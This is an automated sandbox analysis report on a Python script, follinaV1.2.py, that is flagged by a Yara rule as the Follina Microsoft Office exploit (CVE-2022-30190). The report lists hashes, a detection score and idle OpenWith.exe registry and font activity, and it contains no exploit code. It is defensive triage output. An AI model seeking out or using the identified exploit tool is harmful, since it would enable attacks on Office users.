Windows Analysis Report
follinaV1.2.py

Overview

General Information

Sample Name: follinaV1.2.py
Analysis ID: 646040
MD5: c1317d365d0084c4016a280a52608923
SHA1: ea358003fd5b1beba3b2e58991117127afb1eefd
SHA256: 076b22f6815cf168a813fa64e7f0b7e45d5312de16f8c9e65593160cc2c9cb1e
Infos:

Detection

Follina CVE-2022-30190
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device

Classification

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: follinaV1.2.py, type: SAMPLE
Source: OpenWith.exe, 00000000.00000003.241144359.0000017025086000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000000.00000003.241165426.0000017025096000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000000.00000003.241125214.000001702508A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://en.wi7
Source: follinaV1.2.py String found in binary or memory: https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: mal48.expl.winPY@1/0@0/0
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 646040 Sample: follinaV1.2.py Startdate: 15/06/2022 Architecture: WINDOWS Score: 48 7 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->7 5 OpenWith.exe 16 9 2->5         started        process3
No contacted IP infos